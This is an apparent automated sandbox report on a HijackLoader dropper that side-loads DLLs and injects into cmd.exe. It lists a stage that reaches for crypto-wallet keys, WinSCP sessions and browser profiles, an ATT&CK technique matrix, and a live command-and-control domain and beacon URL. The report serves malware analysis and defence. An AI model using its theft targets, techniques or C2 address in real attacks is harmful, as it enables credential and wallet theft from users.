Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtQueryInformationToken: Direct from: 0x7FF6A0502868	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	NtCreateNamedPipeFile: Direct from: 0x1B254690DC1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtAllocateVirtualMemory: Direct from: 0x7FF6A05394D7	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	NtProtectVirtualMemory: Direct from: 0x6C006C	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	NtAllocateVirtualMemory: Direct from: 0x140120A3C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: NULL target: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: NULL target: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe protection: read write	Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe base: 14011BC08	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe base: 32C010	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe base: 14011BC08	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Memory written: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe base: 3AC010	Jump to behavior

Source: C:\Users\user\Desktop\BkTwXj17DH.exe	Process created: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe "C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe" -burn.clean.room="C:\Users\user\Desktop\BkTwXj17DH.exe" -burn.filehandle.attached=516 -burn.filehandle.self=524	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Jump to behavior

Source: C:\Users\user\Desktop\BkTwXj17DH.exe

Code function: 0_2_00501719 InitializeSecurityDescriptor,GetLastError,CreateWellKnownSid,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,CreateWellKnownSid,GetLastError,SetEntriesInAclA,SetSecurityDescriptorOwner,GetLastError,SetSecurityDescriptorGroup,GetLastError,SetSecurityDescriptorDacl,GetLastError,CoInitializeSecurity,LocalFree,

0_2_00501719

Source: C:\Users\user\Desktop\BkTwXj17DH.exe

Code function: 0_2_00503A5F AllocateAndInitializeSid,CheckTokenMembership,

0_2_00503A5F

Source: ActiveISO.exe, 00000003.00000002.1461341393.000001918DE11000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000004.00000002.1528762272.000001B255762000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1732374061.0000000004D41000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: )[%d] Shell_TrayWndTrayNotifyWnd

Source: C:\Users\user\Desktop\BkTwXj17DH.exe

Code function: 0_2_004EEC07 cpuid

0_2_004EEC07

Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: ___lc_locale_name_func,GetLocaleInfoEx,		3_2_00007FFBAA30F610
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: ___lc_locale_name_func,GetLocaleInfoEx,		4_2_00007FFBA817F610

Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\BkTwXj17DH.exe

Code function: 0_2_004D4EDF ConvertStringSecurityDescriptorToSecurityDescriptorW,GetLastError,CreateNamedPipeW,GetLastError,CreateNamedPipeW,GetLastError,CloseHandle,LocalFree,

0_2_004D4EDF

Source: C:\Users\user\Desktop\BkTwXj17DH.exe

Code function: 0_2_004C6037 GetSystemTime,GetDateFormatW,GetLastError,GetLastError,GetDateFormatW,GetLastError,

0_2_004C6037

Source: C:\Users\user\Desktop\BkTwXj17DH.exe

Code function: 0_2_004C61DF GetUserNameW,GetLastError,

0_2_004C61DF

Source: C:\Users\user\Desktop\BkTwXj17DH.exe

Code function: 0_2_0050887B GetTimeZoneInformation,SystemTimeToTzSpecificLocalTime,

0_2_0050887B

Source: C:\Users\user\Desktop\BkTwXj17DH.exe

Code function: 0_2_004C5195 GetModuleHandleW,CoInitializeEx,GetVersionExW,GetLastError,CoUninitialize,

0_2_004C5195

Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Key opened: HKEY_CURRENT_USER\Software\monero-project\monero-core	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Key opened: HKEY_CURRENT_USER\Software\monero-project\monero-core	Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2 Override	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2 Override	Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\24a4ohrz.default-release	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\kz8kl7vh.default	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Directory queried: C:\Users\user\Documents			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Directory queried: C:\Users\user\Documents			Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	3 Native API	11 DLL Side-Loading	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	1 OS Credential Dumping	12 System Time Discovery	Remote Services	11 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	3 Command and Scripting Interpreter	1 Windows Service	11 DLL Side-Loading	1 Abuse Elevation Control Mechanism	1 Credentials in Registry	1 Account Discovery	Remote Desktop Protocol	11 Data from Local System	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Service Execution	Logon Script (Windows)	1 Access Token Manipulation	2 Obfuscated Files or Information	Security Account Manager	13 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	13 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 Windows Service	1 Timestomp	NTDS	147 System Information Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	213 Process Injection	11 DLL Side-Loading	LSA Secrets	121 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 File Deletion	Cached Domain Credentials	2 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	21 Masquerading	DCSync	11 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Virtualization/Sandbox Evasion	Proc Filesystem	1 System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Access Token Manipulation	/etc/passwd and /etc/shadow	1 System Network Configuration Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	213 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
BkTwXj17DH.exe	11%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\xsnxlhd	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\dykhaneiil	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	0%	ReversingLabs
C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	0%	ReversingLabs
C:\Users\user\AppData\Roaming\MonitorBrowser2\Qt5Core.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\MonitorBrowser2\Qt5Gui.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\MonitorBrowser2\Qt5Network.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\MonitorBrowser2\Qt5PrintSupport.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\MonitorBrowser2\Qt5Widgets.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\MonitorBrowser2\StarBurn.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\MonitorBrowser2\msvcp140.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\MonitorBrowser2\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\MonitorBrowser2\vcruntime140_1.dll	0%	ReversingLabs
C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	0%	ReversingLabs
C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\Helicoid.dll	0%	ReversingLabs
C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\Qt5Core.dll	0%	ReversingLabs
C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\Qt5Gui.dll	0%	ReversingLabs
C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\Qt5Network.dll	0%	ReversingLabs
C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\Qt5PrintSupport.dll	0%	ReversingLabs
C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\Qt5Widgets.dll	0%	ReversingLabs
C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\StarBurn.dll	0%	ReversingLabs
C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\msvcp140.dll	0%	ReversingLabs
C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\vcruntime140.dll	0%	ReversingLabs
C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\vcruntime140_1.dll	0%	ReversingLabs
C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	8%	ReversingLabs	Win32.Dropper.HijackLoader

Source	Detection	Scanner	Label
http://lsoft.net/act/register.aspx?PID=%1&Email=%2&User=%31slotReadyRead()2readyRead()1slotError(QNe	0%	Avira URL Cloud	safe
https://sirnisirlo.online:443W	0%	Avira URL Cloud	safe
https://www.lsoft.net/act/1DeRegister()2released()Deactivation	0%	Avira URL Cloud	safe
https://sirnisirlo.online/R	0%	Avira URL Cloud	safe
https://sirnisirlo.online/Z	0%	Avira URL Cloud	safe
http://www.lsoft.net	0%	Avira URL Cloud	safe
http://www.lsoft.net/act/update.aspx?pid=%1&ver=%2&os=%3	0%	Avira URL Cloud	safe
https://sirnisirlo.online/	0%	Avira URL Cloud	safe
https://sirnisirlo.online:443	0%	Avira URL Cloud	safe
http://www.lsoft.net/act/update.aspx?pid=%1&ver=%2&os=%31GotLatestVersion(QString)2LatestVersion(QSt	0%	Avira URL Cloud	safe
https://sirnisirlo.online:443/heavywater.html?knrb8plcews=n4J9xYoI8zATTauyjybQwY5kv8nn2lD2hzX%2Fvxzk	0%	Avira URL Cloud	safe
http://lsoft.net/act/activate.aspx?ID=%11slotReadyRead()2readyRead()1slotError(QNetworkReply::Networ	0%	Avira URL Cloud	safe
http://www.ntfs.com/iso_file_manager.htm	0%	Avira URL Cloud	safe
https://sirnisirlo.online/heavywater.html?knrb8plcews=n4J9xYoI8zATTauyjybQwY5kv8nn2lD2hzX%2FvxzkAN6GXIBiaicSeOB4iSjf20YELqnF21GZYAtcxOy3nMycxQ%3D%3D	0%	Avira URL Cloud	safe
https://sirnisirlo.online/heavywater.html?knrb8plcews=n4J9xYoI8zATTauyjybQwY5kv8nn2lD2hzX%2FvxzkAN6G	0%	Avira URL Cloud	safe
http://lsoft.net/act/activate.aspx?ID=%1Error1slotReadyRead()Error2readyRead()1slotError(QNetworkRep	0%	Avira URL Cloud	safe
http://www.lsoft.net/act/update.aspx?pid=%1&ver=%2&os=%31DownloadInfo(QString)2DownloadInfo(QString)	0%	Avira URL Cloud	safe
http://lsoft.net/act/activate.aspx?ID=%1	0%	Avira URL Cloud	safe
http://www.lsoft.net/act/update.aspx?pid=%1&ver=%2&os=%31LatestVersion(QString)2LatestVersion(QStrin	0%	Avira URL Cloud	safe
https://www.lsoft.net/act/We	0%	Avira URL Cloud	safe
https://www.lsoft.net/act/	0%	Avira URL Cloud	safe
http://lsoft.net/act/register.aspx?PID=%1&Email=%2&User=%3	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
sirnisirlo.online	188.114.96.3	true	true		unknown
241.42.69.40.in-addr.arpa	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://sirnisirlo.online/heavywater.html?knrb8plcews=n4J9xYoI8zATTauyjybQwY5kv8nn2lD2hzX%2FvxzkAN6GXIBiaicSeOB4iSjf20YELqnF21GZYAtcxOy3nMycxQ%3D%3D	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.phreedom.org/md5)08:27	ActiveISO.exe, 00000003.00000002.1465275621.00007FFBAA44A000.00000002.00000001.01000000.0000000B.sdmp, ActiveISO.exe, 00000004.00000002.1532542754.00007FFBA88AA000.00000002.00000001.01000000.00000017.sdmp	false		high
http://www.vmware.com/0	ActiveISO.exe, 00000003.00000002.1461341393.000001918DE11000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000004.00000002.1528762272.000001B255762000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1732374061.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.softwareok.com/?Freeware/Find.Same.Images.OK/History	cmd.exe, 00000005.00000002.1732374061.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	false		high
https://sirnisirlo.online:443W	UploadAlt_Ti.exe, 00000009.00000003.1973982779.00000000005A1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	ActiveISO.exe, 00000003.00000003.1449281120.000001918B2F9000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ocsp.sectigo.com0	ActiveISO.exe, 00000003.00000003.1449281120.000001918B2F9000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.softwareok.com/?Freeware/Find.Same.Images.OK	cmd.exe, 00000005.00000002.1732374061.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	false		high
http://lsoft.net/act/register.aspx?PID=%1&Email=%2&User=%31slotReadyRead()2readyRead()1slotError(QNe	ActiveISO.exe, 00000003.00000002.1462892234.00007FF72A97B000.00000002.00000001.01000000.00000007.sdmp, ActiveISO.exe, 00000004.00000002.1530961084.00007FF7F418B000.00000002.00000001.01000000.00000012.sdmp	false	Avira URL Cloud: safe	unknown
https://sirnisirlo.online/Z	UploadAlt_Ti.exe, 00000009.00000003.1857270455.0000000000583000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://sirnisirlo.online/	UploadAlt_Ti.exe, 00000009.00000003.1972989413.0000000000583000.00000004.00000020.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2005933569.0000000000583000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	ActiveISO.exe, 00000003.00000003.1449281120.000001918B2F9000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.lsoft.net	ActiveISO.exe, 00000004.00000000.1455531882.00007FF7F4173000.00000002.00000001.01000000.00000012.sdmp	false	Avira URL Cloud: safe	unknown
https://sirnisirlo.online/R	UploadAlt_Ti.exe, 00000009.00000003.1972989413.0000000000583000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.lsoft.net/act/1DeRegister()2released()Deactivation	ActiveISO.exe, 00000003.00000002.1462892234.00007FF72A97B000.00000002.00000001.01000000.00000007.sdmp, ActiveISO.exe, 00000004.00000002.1530961084.00007FF7F418B000.00000002.00000001.01000000.00000012.sdmp	false	Avira URL Cloud: safe	unknown
http://www.lsoft.net/act/update.aspx?pid=%1&ver=%2&os=%31GotLatestVersion(QString)2LatestVersion(QSt	ActiveISO.exe, 00000003.00000002.1462892234.00007FF72A97B000.00000002.00000001.01000000.00000007.sdmp, ActiveISO.exe, 00000004.00000002.1530961084.00007FF7F418B000.00000002.00000001.01000000.00000012.sdmp	false	Avira URL Cloud: safe	unknown
http://bugreports.qt.io/	ActiveISO.exe, 00000003.00000002.1465275621.00007FFBAA44A000.00000002.00000001.01000000.0000000B.sdmp, ActiveISO.exe, 00000004.00000002.1532542754.00007FFBA88AA000.00000002.00000001.01000000.00000017.sdmp	false		high
https://sirnisirlo.online:443	UploadAlt_Ti.exe, 00000009.00000003.1895332607.00000000005A1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.softwareok.de/?Freeware/Find.Same.Images.OK	cmd.exe, 00000005.00000002.1732374061.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.lsoft.net/act/update.aspx?pid=%1&ver=%2&os=%3	ActiveISO.exe, ActiveISO.exe, 00000004.00000002.1530961084.00007FF7F418B000.00000002.00000001.01000000.00000012.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0	ActiveISO.exe, 00000003.00000003.1451945876.000001918E941000.00000004.00000001.00020000.00000000.sdmp, ActiveISO.exe, 00000003.00000003.1452354508.000001918B2F9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000003.00000003.1452401165.000001918B2F9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000003.00000003.1450765830.000001918E96B000.00000004.00000001.00020000.00000000.sdmp, ActiveISO.exe, 00000003.00000003.1453594993.000001918E941000.00000004.00000001.00020000.00000000.sdmp	false		high
http://lsoft.net/act/activate.aspx?ID=%11slotReadyRead()2readyRead()1slotError(QNetworkReply::Networ	ActiveISO.exe, 00000003.00000002.1462892234.00007FF72A97B000.00000002.00000001.01000000.00000007.sdmp, ActiveISO.exe, 00000004.00000002.1530961084.00007FF7F418B000.00000002.00000001.01000000.00000012.sdmp	false	Avira URL Cloud: safe	unknown
https://sirnisirlo.online:443/heavywater.html?knrb8plcews=n4J9xYoI8zATTauyjybQwY5kv8nn2lD2hzX%2Fvxzk	UploadAlt_Ti.exe, 00000009.00000003.1843864307.0000000000533000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.softwareok.de/?seite=faq-Find.Same.Images.OK&faq=0	cmd.exe, 00000005.00000002.1732374061.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.softwareok.de	ActiveISO.exe, 00000003.00000002.1461341393.000001918DE11000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000004.00000002.1528762272.000001B255762000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1732374061.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.softwareok.de/?Freeware/Find.Same.Images.OK/History	cmd.exe, 00000005.00000002.1732374061.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.softwareok.com/?Download=Find.Same.Images.OK	cmd.exe, 00000005.00000002.1732374061.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	false		high
https://sirnisirlo.online/heavywater.html?knrb8plcews=n4J9xYoI8zATTauyjybQwY5kv8nn2lD2hzX%2FvxzkAN6G	UploadAlt_Ti.exe, 00000009.00000003.1988875965.0000000000512000.00000004.00000020.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000003.1988875965.0000000000542000.00000004.00000020.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000003.1843864307.0000000000533000.00000004.00000020.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2017301615.0000000007C03000.00000004.00001000.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000003.1857413936.0000000000512000.00000004.00000020.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2005933569.0000000000542000.00000004.00000020.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000003.1955444803.0000000000542000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://lsoft.net/act/activate.aspx?ID=%1Error1slotReadyRead()Error2readyRead()1slotError(QNetworkRep	ActiveISO.exe, 00000003.00000002.1462892234.00007FF72A97B000.00000002.00000001.01000000.00000007.sdmp, ActiveISO.exe, 00000004.00000002.1530961084.00007FF7F418B000.00000002.00000001.01000000.00000012.sdmp	false	Avira URL Cloud: safe	unknown
http://www.phreedom.org/md5)	ActiveISO.exe, 00000003.00000002.1465275621.00007FFBAA44A000.00000002.00000001.01000000.0000000B.sdmp, ActiveISO.exe, 00000004.00000002.1532542754.00007FFBA88AA000.00000002.00000001.01000000.00000017.sdmp	false		high
https://sectigo.com/CPS0	ActiveISO.exe, 00000003.00000003.1449281120.000001918B2F9000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.aiim.org/pdfa/ns/id/	ActiveISO.exe, 00000003.00000002.1466012295.00007FFBAA858000.00000002.00000001.01000000.00000010.sdmp, ActiveISO.exe, 00000004.00000002.1533059618.00007FFBA8CB8000.00000002.00000001.01000000.00000016.sdmp	false		high
http://www.lsoft.net/act/update.aspx?pid=%1&ver=%2&os=%31LatestVersion(QString)2LatestVersion(QStrin	ActiveISO.exe, 00000003.00000002.1462892234.00007FF72A97B000.00000002.00000001.01000000.00000007.sdmp, ActiveISO.exe, 00000004.00000002.1530961084.00007FF7F418B000.00000002.00000001.01000000.00000012.sdmp	false	Avira URL Cloud: safe	unknown
http://www.lsoft.net/act/update.aspx?pid=%1&ver=%2&os=%31DownloadInfo(QString)2DownloadInfo(QString)	ActiveISO.exe, 00000003.00000002.1462892234.00007FF72A97B000.00000002.00000001.01000000.00000007.sdmp, ActiveISO.exe, 00000004.00000002.1530961084.00007FF7F418B000.00000002.00000001.01000000.00000012.sdmp	false	Avira URL Cloud: safe	unknown
http://www.softwareok.de/?Download=Find.Same.Images.OK	cmd.exe, 00000005.00000002.1732374061.0000000004D41000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 00000009.00000002.2006778844.0000000002680000.00000004.00000001.00020000.00000000.sdmp	false		high
http://ocsp.thawte.com0	ActiveISO.exe, 00000003.00000003.1451945876.000001918E941000.00000004.00000001.00020000.00000000.sdmp, ActiveISO.exe, 00000003.00000003.1452354508.000001918B2F9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000003.00000003.1452401165.000001918B2F9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000003.00000003.1450765830.000001918E96B000.00000004.00000001.00020000.00000000.sdmp, ActiveISO.exe, 00000003.00000003.1453594993.000001918E941000.00000004.00000001.00020000.00000000.sdmp	false		high
http://lsoft.net/act/activate.aspx?ID=%1	ActiveISO.exe, ActiveISO.exe, 00000004.00000002.1530961084.00007FF7F418B000.00000002.00000001.01000000.00000012.sdmp	false	Avira URL Cloud: safe	unknown
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#	ActiveISO.exe, 00000003.00000003.1449281120.000001918B2F9000.00000004.00000020.00020000.00000000.sdmp	false		high
